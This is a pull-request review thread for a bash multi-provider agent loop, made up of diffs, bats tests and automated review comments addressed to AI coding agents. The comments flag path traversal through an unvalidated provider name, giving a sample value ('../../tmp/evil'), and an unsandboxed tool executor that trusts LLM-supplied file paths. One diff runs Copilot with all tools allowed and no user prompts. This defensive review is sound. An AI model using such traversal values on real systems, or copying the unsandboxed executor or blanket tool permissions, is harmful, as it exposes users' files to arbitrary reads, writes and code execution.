- local provider_name="${RALPH_PROVIDER:-claude}"
+ local provider_name="${RALPH_PROVIDER:-claude}"
+
+ # Validate provider name to prevent path traversal
+ if [[ ! "$provider_name" =~ ^[a-zA-Z0-9_-]+$ ]]; then
+ log_status "ERROR" "Invalid provider name: $provider_name"
+ exit 1
+ fi🚀 Want me to fix this? Reply ex: "fix it for me".
🤖 Prompt for AI
In file lib/providers/base.sh around line 6:
`RALPH_PROVIDER` is used to construct a path without validation. Path traversal sequences like `../../tmp/evil` could source arbitrary scripts. Consider validating that the provider name contains only alphanumeric characters and hyphens.
|
|
||
| case "$tool_name" in | ||
| "read_file") | ||
| local path=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="path">(.*?)<\/arg>/s') |
There was a problem hiding this comment.
🔴 Critical
lib/tool_executor.sh:14 Paths from LLM output are used verbatim, enabling path traversal in read_file and write_file. Suggest canonicalizing the path and enforcing it stays within a sandbox/project root (reject .., symlinks, and anything outside) before any I/O.
🚀 Want me to fix this? Reply ex: "fix it for me".
🤖 Prompt for AI
In file lib/tool_executor.sh around line 14:
Paths from LLM output are used verbatim, enabling path traversal in `read_file` and `write_file`. Suggest canonicalizing the path and enforcing it stays within a sandbox/project root (reject `..`, symlinks, and anything outside) before any I/O.
| ;; | ||
| "write_file") | ||
| local path=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="path">(.*?)<\/arg>/s') | ||
| local file_content=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="content">(.*?)<\/arg>/s') |
There was a problem hiding this comment.
🟡 Medium
lib/tool_executor.sh:25 The non-greedy (.*?) regex stops at the first </arg>, silently truncating content containing that literal string (e.g., XML, JSX). Consider using a different delimiter strategy or CDATA-style escaping for the content argument.
🚀 Want me to fix this? Reply ex: "fix it for me".
🤖 Prompt for AI
In file lib/tool_executor.sh around line 25:
The non-greedy `(.*?)` regex stops at the first `</arg>`, silently truncating content containing that literal string (e.g., XML, JSX). Consider using a different delimiter strategy or CDATA-style escaping for the content argument.
- Update get_session_file_age_hours to return -1 for missing files - Refactor should_resume_session to use parse_iso_to_epoch - Add logging to init_claude_session - Update session continuity tests for provider-based architecture
There was a problem hiding this comment.
Actionable comments posted: 1
🤖 Fix all issues with AI agents
In `@lib/providers/claude.sh`:
- Around line 175-179: The global variable LIVE_OUTPUT is being mutated inside
the function, causing the false value to persist across iterations; declare a
local variable (e.g., live_output) initialized from LIVE_OUTPUT at the top of
the function and update that local variable when falling back (set
live_output=false) instead of mutating LIVE_OUTPUT, and then use $live_output
throughout the rest of the function body (analogous to the CLAUDE_OUTPUT_FORMAT
fix).
🧹 Nitpick comments (4)
tests/unit/test_providers.bats (3)
50-69: Function-existence tests don't userun— a source error will abort the entire suite.If any provider script has a syntax error,
sourceon lines 51/58/65 will cause bats to abort rather than reporting a clean failure for that test. Consider wrapping inrun bash -c 'source ... && declare -F ...'or accept this as intentional "fail fast" behavior.
77-88: Consider adding a brief comment explaining the glob-matching test strategy.These tests validate that
Bash(git *)style glob patterns in the whitelist correctly match specific tool invocations while rejecting unauthorized ones. A one-line comment would help future readers understand why parenthesized patterns are significant. As per coding guidelines: "In test files, include comments explaining complex test scenarios and test strategy."
97-115: Good security coverage for provider name validation.Both path traversal and special character injection are tested. Consider also adding a test for a syntactically valid but non-existent provider (e.g.,
RALPH_PROVIDER="nonexistent") to exercise the "provider script not found" error path on line 26 ofbase.sh.Suggested additional test
`@test` "load_provider rejects non-existent provider" { export RALPH_PROVIDER="nonexistent_provider" export RALPH_HOME="$BATS_TEST_DIRNAME/../.." source "$BATS_TEST_DIRNAME/../../lib/providers/base.sh" run load_provider assert_failure [[ "$output" == *"[ERROR] AI provider script not found"* ]] }lib/providers/claude.sh (1)
78-99: Extractbuild_loop_contextinto a shared utility to avoid duplication across providers.This function is identical in
claude.sh,gemini.sh, andcopilot.sh. Move it tolib/providers/base.sh(or a shared utility module) to reduce maintenance burden and ensure consistency across all three providers.
| if [[ "$LIVE_OUTPUT" == "true" ]]; then | ||
| log_status "ERROR" "Live mode requires a built Claude command. Falling back to background mode." | ||
| LIVE_OUTPUT=false | ||
| fi | ||
| fi |
There was a problem hiding this comment.
Global mutation of LIVE_OUTPUT persists across loop iterations.
Same class of bug that was just fixed for CLAUDE_OUTPUT_FORMAT (line 162). If the modern CLI build fails once, LIVE_OUTPUT is permanently flipped to false for all subsequent calls. Use a local variable instead.
Proposed fix
+ local live_output="$LIVE_OUTPUT"
if [[ "$use_modern_cli" != "true" ]]; then
- if [[ "$LIVE_OUTPUT" == "true" ]]; then
+ if [[ "$live_output" == "true" ]]; then
log_status "ERROR" "Live mode requires a built Claude command. Falling back to background mode."
- LIVE_OUTPUT=false
+ live_output=false
fi
fiThen use $live_output in place of $LIVE_OUTPUT throughout the rest of the function body.
🤖 Prompt for AI Agents
In `@lib/providers/claude.sh` around lines 175 - 179, The global variable
LIVE_OUTPUT is being mutated inside the function, causing the false value to
persist across iterations; declare a local variable (e.g., live_output)
initialized from LIVE_OUTPUT at the top of the function and update that local
variable when falling back (set live_output=false) instead of mutating
LIVE_OUTPUT, and then use $live_output throughout the rest of the function body
(analogous to the CLAUDE_OUTPUT_FORMAT fix).
- Move build_loop_context() to lib/providers/base.sh - Remove duplicates from claude.sh, gemini.sh, and copilot.sh - Source base.sh in provider scripts - Restore missing stdin redirect comments in claude.sh - Update modern CLI tests to match new implementation
There was a problem hiding this comment.
Actionable comments posted: 2
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (2)
tests/unit/test_session_continuity.bats (1)
419-434:⚠️ Potential issue | 🟠 MajorTest sources
ralph_loop.shbutinit_claude_sessionnow lives inlib/providers/claude.sh.Line 421 still sources
ralph_loop.sh, butinit_claude_sessionwas moved tolib/providers/claude.shas part of this PR. Other tests in this file (lines 438, 447, 456) were updated to sourceclaude.sh. This test will likely fail becauseinit_claude_sessionwon't be defined.Proposed fix
- source "${BATS_TEST_DIRNAME}/../../ralph_loop.sh" + source "${BATS_TEST_DIRNAME}/../../lib/providers/claude.sh"lib/response_analyzer.sh (1)
857-859:⚠️ Potential issue | 🔴 CriticalMove all session management functions to
lib/response_analyzer.shand implement missing 24-hour expiration logic.Per coding guidelines, all seven session management functions must be implemented in
lib/response_analyzer.shwith 24-hour expiration and.ralph/.claude_session_idpersistence. Currently:
store_session_id(),get_last_session_id(),should_resume_session()are inresponse_analyzer.shget_session_id(),reset_session(),log_session_transition(),init_session_tracking()are incorrectly split into a separatelib/session_manager.shfile- No 24-hour expiration logic exists in any of the session functions
Consolidate all functions into
response_analyzer.shand add validation to enforce 24-hour session expiration.
🤖 Fix all issues with AI agents
In `@lib/providers/claude.sh`:
- Around line 333-340: save_claude_session currently writes the bare session ID
which breaks response_analyzer.sh that expects JSON; update save_claude_session
to emit the same JSON structure as store_session_id (e.g.,
{"session_id":"...","timestamp":"..."}) or, better, call the existing
store_session_id function with the extracted session_id so the file at
$RALPH_DIR/.claude_session_id remains consistent; also modify
init_claude_session to parse the JSON format (reading .session_id and .timestamp
via jq) rather than expecting raw text so get_last_session_id and
should_resume_session keep working.
In `@tests/unit/test_session_continuity.bats`:
- Around line 381-387: The test's assertion in
tests/unit/test_session_continuity.bats incorrectly looks for "Darwin" or
"uname" in get_session_file_age_hours and will always skip; update the test to
assert for the actual cross-platform implementation pattern used in
get_session_file_age_hours (e.g. presence of the stat -c / stat -f / date -r
cascade or the specific sequence of commands used) so it matches the function's
real code path and no longer triggers the skip branch.
🧹 Nitpick comments (4)
lib/response_analyzer.sh (1)
826-841: SC2155: Separate declaration from assignment to avoid masking return values.Lines 832–833 combine
localwith command substitution, masking any non-zero exit status fromget_epoch_seconds/parse_iso_to_epoch. Ifparse_iso_to_epochfails, you silently get the current epoch (per its fallback), making the session appear fresh and resumable — a false positive.Proposed fix
# Calculate session age using date utilities - local now=$(get_epoch_seconds) - local session_time=$(parse_iso_to_epoch "$timestamp") + local now + now=$(get_epoch_seconds) + local session_time + session_time=$(parse_iso_to_epoch "$timestamp")lib/providers/copilot.sh (2)
16-32: Unused variableslive_modeandsession_file; missing live-mode warning.
live_mode(Line 19) is accepted but never referenced — unlike the Gemini provider which now emits a warning when live mode is requested.session_file(Line 23) is declared but never used anywhere.Proposed fix
local live_mode=$3 local timestamp=$(date '+%Y-%m-%d_%H-%M-%S') local output_file="$LOG_DIR/copilot_output_${timestamp}.log" - local session_file="$RALPH_DIR/.copilot_session_id" + if [[ "$live_mode" == "true" ]]; then + log_status "WARN" "Live mode is not yet supported for Copilot provider. Falling back to background mode." + fi + local session_arg=""
26-31:CLAUDE_USE_CONTINUEis a provider-specific variable name used across providers.In a multi-provider architecture, reusing a Claude-specific env var (
CLAUDE_USE_CONTINUE) for Copilot session resume is confusing. Consider introducing a provider-agnostic variable (e.g.,RALPH_USE_CONTINUEorPROVIDER_USE_CONTINUE) that all providers reference.lib/providers/claude.sh (1)
15-41: Semver comparison overflows when minor or patch ≥ 100.The formula
major * 10000 + minor * 100 + patchbreaks for versions like2.100.0(becomes2 * 10000 + 100 * 100 + 0 = 30000) vs2.99.99(=29999), which works, but3.0.0(=30000) would collide with2.100.0. This is unlikely for Claude CLI versions in practice, but worth noting.
| # Save session ID after successful execution | ||
| save_claude_session() { | ||
| local output_file=$1 | ||
| if [[ -f "$output_file" ]]; then | ||
| local session_id=$(jq -r '.metadata.session_id // .session_id // empty' "$output_file" 2>/dev/null) | ||
| [[ -n "$session_id" && "$session_id" != "null" ]] && echo "$session_id" > "$RALPH_DIR/.claude_session_id" | ||
| fi | ||
| } |
There was a problem hiding this comment.
Session file format mismatch — save_claude_session writes raw text but get_last_session_id expects JSON.
save_claude_session (Line 338) writes the bare session ID to $RALPH_DIR/.claude_session_id:
echo "$session_id" > "$RALPH_DIR/.claude_session_id"
But in lib/response_analyzer.sh, store_session_id writes JSON {"session_id": "...", "timestamp": "..."} to the same file, and get_last_session_id reads it with jq -r '.session_id'. Similarly, should_resume_session reads .timestamp from this file.
When save_claude_session runs after a successful Claude execution, it overwrites the file with raw text, breaking get_last_session_id and should_resume_session on the next loop iteration.
Proposed fix — use store_session_id for consistent format
save_claude_session() {
local output_file=$1
if [[ -f "$output_file" ]]; then
- local session_id=$(jq -r '.metadata.session_id // .session_id // empty' "$output_file" 2>/dev/null)
- [[ -n "$session_id" && "$session_id" != "null" ]] && echo "$session_id" > "$RALPH_DIR/.claude_session_id"
+ local session_id
+ session_id=$(jq -r '.metadata.session_id // .session_id // empty' "$output_file" 2>/dev/null)
+ [[ -n "$session_id" && "$session_id" != "null" ]] && store_session_id "$session_id"
fi
}Also update init_claude_session to read the JSON format:
else
- local session_id=$(cat "$session_file" 2>/dev/null)
+ local session_id
+ session_id=$(jq -r '.session_id // ""' "$session_file" 2>/dev/null)🧰 Tools
🪛 Shellcheck (0.11.0)
[warning] 337-337: Declare and assign separately to avoid masking return values.
(SC2155)
🤖 Prompt for AI Agents
In `@lib/providers/claude.sh` around lines 333 - 340, save_claude_session
currently writes the bare session ID which breaks response_analyzer.sh that
expects JSON; update save_claude_session to emit the same JSON structure as
store_session_id (e.g., {"session_id":"...","timestamp":"..."}) or, better, call
the existing store_session_id function with the extracted session_id so the file
at $RALPH_DIR/.claude_session_id remains consistent; also modify
init_claude_session to parse the JSON format (reading .session_id and .timestamp
via jq) rather than expecting raw text so get_last_session_id and
should_resume_session keep working.
| @test "init_claude_session uses cross-platform stat command" { | ||
| # Check for uname or Darwin/Linux detection in get_session_file_age_hours | ||
| run grep -A30 'get_session_file_age_hours' "${BATS_TEST_DIRNAME}/../../ralph_loop.sh" | ||
| run grep -A30 'get_session_file_age_hours' "${BATS_TEST_DIRNAME}/../../lib/providers/claude.sh" | ||
|
|
||
| # Should have cross-platform handling | ||
| [[ "$output" == *"Darwin"* ]] || [[ "$output" == *"uname"* ]] || skip "Cross-platform stat not yet implemented" | ||
| } |
There was a problem hiding this comment.
Test assertion doesn't match current implementation — will always skip.
This test checks for "Darwin" or "uname" in get_session_file_age_hours, but the actual implementation (in claude.sh lines 347-349) uses a stat -c → stat -f → date -r cascade without any uname or Darwin detection. The test will always hit the skip branch.
Consider updating the assertion to match the actual cross-platform strategy:
- [[ "$output" == *"Darwin"* ]] || [[ "$output" == *"uname"* ]] || skip "Cross-platform stat not yet implemented"
+ [[ "$output" == *"stat"* ]] || skip "Cross-platform stat not yet implemented"📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| @test "init_claude_session uses cross-platform stat command" { | |
| # Check for uname or Darwin/Linux detection in get_session_file_age_hours | |
| run grep -A30 'get_session_file_age_hours' "${BATS_TEST_DIRNAME}/../../ralph_loop.sh" | |
| run grep -A30 'get_session_file_age_hours' "${BATS_TEST_DIRNAME}/../../lib/providers/claude.sh" | |
| # Should have cross-platform handling | |
| [[ "$output" == *"Darwin"* ]] || [[ "$output" == *"uname"* ]] || skip "Cross-platform stat not yet implemented" | |
| } | |
| `@test` "init_claude_session uses cross-platform stat command" { | |
| # Check for uname or Darwin/Linux detection in get_session_file_age_hours | |
| run grep -A30 'get_session_file_age_hours' "${BATS_TEST_DIRNAME}/../../lib/providers/claude.sh" | |
| # Should have cross-platform handling | |
| [[ "$output" == *"stat"* ]] || skip "Cross-platform stat not yet implemented" | |
| } |
🤖 Prompt for AI Agents
In `@tests/unit/test_session_continuity.bats` around lines 381 - 387, The test's
assertion in tests/unit/test_session_continuity.bats incorrectly looks for
"Darwin" or "uname" in get_session_file_age_hours and will always skip; update
the test to assert for the actual cross-platform implementation pattern used in
get_session_file_age_hours (e.g. presence of the stat -c / stat -f / date -r
cascade or the specific sequence of commands used) so it matches the function's
real code path and no longer triggers the skip branch.
There was a problem hiding this comment.
Actionable comments posted: 1
🤖 Fix all issues with AI agents
In `@lib/providers/copilot.sh`:
- Around line 38-42: Check that the prompt file exists and is readable before
using cat: in copilot.sh, before computing prompt_content and full_prompt, test
"$prompt_file" (or use [[ -r $prompt_file ]]) and if it is missing/unreadable
call processLogger or fprintf to stderr and exit/non-zero; update the logic
around build_loop_context, prompt_content, and full_prompt so you never
construct full_prompt from an empty prompt_content when the file is absent.
🧹 Nitpick comments (5)
lib/providers/base.sh (1)
36-49: Separate declaration from assignment to avoid masking return values.ShellCheck SC2155 applies to lines 37, 42, and 47. While the risk is low here (values are guarded by null/empty checks), separating
localdeclarations from command substitutions is a good habit — it preserves the exit status for debugging and future error handling.♻️ Proposed fix (example for line 37; apply same pattern to lines 42 and 47)
if [[ -f "$RALPH_DIR/fix_plan.md" ]]; then - local incomplete_tasks=$(grep -cE "^[[:space:]]*- \[ \]" "$RALPH_DIR/fix_plan.md" 2>/dev/null || true) + local incomplete_tasks + incomplete_tasks=$(grep -cE "^[[:space:]]*- \[ \]" "$RALPH_DIR/fix_plan.md" 2>/dev/null || true) context+="Remaining tasks: ${incomplete_tasks:-0}. " fi if [[ -f "$RALPH_DIR/.circuit_breaker_state" ]]; then - local cb_state=$(jq -r '.state // "UNKNOWN"' "$RALPH_DIR/.circuit_breaker_state" 2>/dev/null) + local cb_state + cb_state=$(jq -r '.state // "UNKNOWN"' "$RALPH_DIR/.circuit_breaker_state" 2>/dev/null) [[ "$cb_state" != "CLOSED" && -n "$cb_state" && "$cb_state" != "null" ]] && context+="Circuit breaker: $cb_state. " fi if [[ -f "$RALPH_DIR/.response_analysis" ]]; then - local prev_summary=$(jq -r '.analysis.work_summary // ""' "$RALPH_DIR/.response_analysis" 2>/dev/null | head -c 200) + local prev_summary + prev_summary=$(jq -r '.analysis.work_summary // ""' "$RALPH_DIR/.response_analysis" 2>/dev/null | head -c 200) [[ -n "$prev_summary" && "$prev_summary" != "null" ]] && context+="Previous: $prev_summary" filib/providers/copilot.sh (2)
22-35: Unused variables and fragilesession_argstring — use an array likegemini.sh.
live_mode(line 22) is accepted but never used. Gemini's provider now logs a warning when live mode is requested but unsupported — Copilot should do the same.session_file(line 26) is declared but never referenced — dead code.$session_argon line 56 relies on word splitting.gemini.shwas already refactored to use an array for this; Copilot should follow the same pattern for consistency and robustness.♻️ Proposed fix
local prompt_file=$2 - local live_mode=$3 - + local live_mode=$3 + + if [[ "$live_mode" == "true" ]]; then + log_status "WARN" "Live mode is not yet supported for Copilot provider. Falling back to background mode." + fi + local timestamp=$(date '+%Y-%m-%d_%H-%M-%S') local output_file="$LOG_DIR/copilot_output_${timestamp}.log" - local session_file="$RALPH_DIR/.copilot_session_id" - local session_arg="" + local -a session_args=() if [[ "$CLAUDE_USE_CONTINUE" == "true" ]]; then - # Copilot uses --resume [sessionId] - # We need to extract the session ID from previous runs if possible - # Currently we don't have a reliable way to get sessionId from stdout unless we parse it - # For now, we try --resume without ID which resumes "most recent" - session_arg="--resume" + session_args=("--resume") fiAnd update the invocation:
- $COPILOT_CMD -p "$full_prompt" \ - $session_arg \ + "$COPILOT_CMD" -p "$full_prompt" \ + "${session_args[@]}" \ --allow-all-tools \ --no-ask-user \ > "$output_file" 2>&1
29-29:CLAUDE_USE_CONTINUEis a Claude-specific name used across all providers.All three providers (Claude, Gemini, Copilot) check
CLAUDE_USE_CONTINUEto decide whether to resume sessions. This variable should be provider-agnostic, e.g.,RALPH_USE_CONTINUEorPROVIDER_USE_CONTINUE, since it governs a cross-provider behavior. The current name is confusing and will mislead anyone configuring a non-Claude provider.This applies equally in
gemini.sh(line 31) and throughoutclaude.sh.lib/providers/claude.sh (2)
28-34: Version array parsing is fragile with globbing — useread -rainstead.Lines 30-31 use unquoted
${version//./ }to split version strings into arrays, which relies on word splitting and is susceptible to globbing (ShellCheck SC2206). If a version component happens to match a filename glob pattern, it could expand unexpectedly.♻️ Proposed fix
- local ver_parts=(${version//./ }) - local req_parts=(${required//./ }) + local -a ver_parts + IFS='.' read -ra ver_parts <<< "$version" + local -a req_parts + IFS='.' read -ra req_parts <<< "$required"
273-280:$?on line 280 capturesrecord_loop_result's exit status — correct but fragile.The
[[ $? -ne 0 ]] && return 3on line 280 depends on nothing executing betweenrecord_loop_result(line 279) and the$?check. This is correct today but fragile — any future insertion between these lines would silently break the check. Consider capturing the exit code directly.♻️ Suggested alternative
- record_loop_result "$loop_count" "$files_changed" "$has_errors" "$output_length" - [[ $? -ne 0 ]] && return 3 + if ! record_loop_result "$loop_count" "$files_changed" "$has_errors" "$output_length"; then + return 3 + fi
| local loop_context=$(build_loop_context "$loop_count") | ||
| local prompt_content=$(cat "$prompt_file") | ||
| local full_prompt="$loop_context | ||
|
|
||
| $prompt_content" |
There was a problem hiding this comment.
Prompt file existence is not checked before cat.
If $prompt_file is missing or unreadable, cat will fail silently (stderr goes to the log) and full_prompt will contain only the loop context. This could send a malformed prompt to Copilot without any warning.
♻️ Proposed fix
local loop_context=$(build_loop_context "$loop_count")
- local prompt_content=$(cat "$prompt_file")
+ if [[ ! -f "$prompt_file" ]]; then
+ log_status "ERROR" "Prompt file not found: $prompt_file"
+ return 1
+ fi
+ local prompt_content
+ prompt_content=$(cat "$prompt_file")📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| local loop_context=$(build_loop_context "$loop_count") | |
| local prompt_content=$(cat "$prompt_file") | |
| local full_prompt="$loop_context | |
| $prompt_content" | |
| local loop_context=$(build_loop_context "$loop_count") | |
| if [[ ! -f "$prompt_file" ]]; then | |
| log_status "ERROR" "Prompt file not found: $prompt_file" | |
| return 1 | |
| fi | |
| local prompt_content | |
| prompt_content=$(cat "$prompt_file") | |
| local full_prompt="$loop_context | |
| $prompt_content" |
🧰 Tools
🪛 Shellcheck (0.11.0)
[warning] 38-38: Declare and assign separately to avoid masking return values.
(SC2155)
[warning] 39-39: Declare and assign separately to avoid masking return values.
(SC2155)
🤖 Prompt for AI Agents
In `@lib/providers/copilot.sh` around lines 38 - 42, Check that the prompt file
exists and is readable before using cat: in copilot.sh, before computing
prompt_content and full_prompt, test "$prompt_file" (or use [[ -r $prompt_file
]]) and if it is missing/unreadable call processLogger or fprintf to stderr and
exit/non-zero; update the logic around build_loop_context, prompt_content, and
full_prompt so you never construct full_prompt from an empty prompt_content when
the file is absent.
There was a problem hiding this comment.
Actionable comments posted: 1
🤖 Fix all issues with AI agents
In `@ralph_loop.sh`:
- Around line 672-674: The provider scripts (copilot.sh and gemini.sh) do not
follow the exit-code contract expected by provider_execute/ralph_loop.sh
(0=success, 2=API limit, 3=circuit breaker) causing API-limit and
circuit-breaker branches to never run; update the provider implementations so
their entrypoint (the function or script invoked by provider_execute) returns 0
on success, 2 when an upstream API-rate/limit error is detected, and 3 when a
circuit-breaker/blacklist condition is hit (mirror how claude.sh does it);
ensure any internal helpers or wrapper functions used by provider_execute
propagate these numeric exit codes instead of collapsing to 0/1 so
provider_execute "$loop_count" "$PROMPT_FILE" "$LIVE_OUTPUT" yields the correct
exec_result for ralph_loop.sh to handle.
🧹 Nitpick comments (2)
lib/session_manager.sh (2)
26-26: SC2155: Declare and assign separately to avoid masking return values.Multiple lines combine
localdeclaration with command substitution (e.g.,local ts=$(get_iso_timestamp)). If the command fails, its non-zero exit code is masked by thelocalbuiltin's success. This is flagged by ShellCheck (SC2155) on lines 26, 59, 61, 91, 93, 114, and 115.For example:
Pattern to apply throughout
- local ts=$(get_iso_timestamp) + local ts + ts=$(get_iso_timestamp)Also applies to: 59-59, 61-61, 91-91, 93-93, 114-115
4-7: Consolidate duplicate variable definitions withralph_loop.sh.
RALPH_SESSION_FILE,RALPH_SESSION_HISTORY_FILE, andCLAUDE_SESSION_FILEare defined here (lines 5–7) and again inralph_loop.sh(lines 59, 64–65). Althoughsession_manager.shis sourced first (line 24 ofralph_loop.sh), the later definitions inralph_loop.shoverwrite these values. While the values are identical today, this duplication creates a maintenance trap—changes in one file won't propagate unless both are updated.Define these paths in exactly one location (preferably in
session_manager.shsince it's the session management module) and remove the duplicates fromralph_loop.sh.
| # Execute AI provider | ||
| provider_execute "$loop_count" "$PROMPT_FILE" "$LIVE_OUTPUT" | ||
| local exec_result=$? |
There was a problem hiding this comment.
🧩 Analysis chain
🏁 Script executed:
# First, let's find the provider files
find . -path "*/providers/*.sh" -type f | head -20Repository: frankbria/ralph-claude-code
Length of output: 173
🏁 Script executed:
# Let's check the ralph_loop.sh to see what exit codes it actually handles
rg -n -A 5 'case.*exec_result' ralph_loop.shRepository: frankbria/ralph-claude-code
Length of output: 53
🏁 Script executed:
# Check provider_execute function signatures and exit codes in all providers
echo "=== Searching for provider_execute definitions and returns ==="
rg -n -B 2 -A 15 'provider_execute\s*\(' lib/providers/*.sh 2>/dev/null | head -100Repository: frankbria/ralph-claude-code
Length of output: 3455
🏁 Script executed:
# Get complete provider_execute implementations with all returns
echo "=== claude.sh execute_claude_code returns ==="
rg -n 'return|exit' lib/providers/claude.sh | grep -E 'return [0-9]|exit [0-9]'
echo ""
echo "=== copilot.sh provider_execute returns ==="
rg -n 'return|exit' lib/providers/copilot.sh | grep -E 'return [0-9]|exit [0-9]'
echo ""
echo "=== gemini.sh provider_execute returns ==="
rg -n 'return|exit' lib/providers/gemini.sh | grep -E 'return [0-9]|exit [0-9]'
echo ""
echo "=== ralph_loop.sh exit code handling (broader search) ==="
rg -n -B 2 -A 5 'exec_result' ralph_loop.sh | head -80Repository: frankbria/ralph-claude-code
Length of output: 1906
🏁 Script executed:
# Search for the response_analysis or exit signal handling in ralph_loop.sh
echo "=== Looking for exit signal and response_analysis handling ==="
rg -n -B 3 -A 3 'EXIT_SIGNAL\|response_analysis\|project_complete' ralph_loop.shRepository: frankbria/ralph-claude-code
Length of output: 133
🏁 Script executed:
# Read the full provider_execute implementations
echo "=== claude.sh full functions ==="
sed -n '108,150p' lib/providers/claude.sh
echo ""
echo "=== copilot.sh full functions ==="
sed -n '19,80p' lib/providers/copilot.sh
echo ""
echo "=== gemini.sh full functions ==="
sed -n '19,80p' lib/providers/gemini.shRepository: frankbria/ralph-claude-code
Length of output: 5531
Provider implementations don't honor the exit code contract, breaking API limit and circuit breaker handling for Copilot and Gemini.
The exit code contract (0=success, 2=API limit, 3=circuit breaker) is only implemented in claude.sh. Both copilot.sh and gemini.sh return only 0 or 1, meaning ralph_loop.sh's API-limit path (line 688) and circuit-breaker path (line 681) will never trigger for these providers. This is a functional gap, not a documentation issue — all providers must return the same exit codes to match the loop's expectations.
🤖 Prompt for AI Agents
In `@ralph_loop.sh` around lines 672 - 674, The provider scripts (copilot.sh and
gemini.sh) do not follow the exit-code contract expected by
provider_execute/ralph_loop.sh (0=success, 2=API limit, 3=circuit breaker)
causing API-limit and circuit-breaker branches to never run; update the provider
implementations so their entrypoint (the function or script invoked by
provider_execute) returns 0 on success, 2 when an upstream API-rate/limit error
is detected, and 3 when a circuit-breaker/blacklist condition is hit (mirror how
claude.sh does it); ensure any internal helpers or wrapper functions used by
provider_execute propagate these numeric exit codes instead of collapsing to 0/1
so provider_execute "$loop_count" "$PROMPT_FILE" "$LIVE_OUTPUT" yields the
correct exec_result for ralph_loop.sh to handle.
- Validate prompt file existence in copilot.sh - Implement exit code 2 for API limits in gemini.sh - Validate loop_number as integer in log_session_transition
This change introduces a provider-based architecture to support multiple LLM backends (Claude, Gemini, Copilot). It also adds a session manager and tool executor to centralize execution logic and improve session continuity.
Summary by CodeRabbit
New Features
Documentation
Tests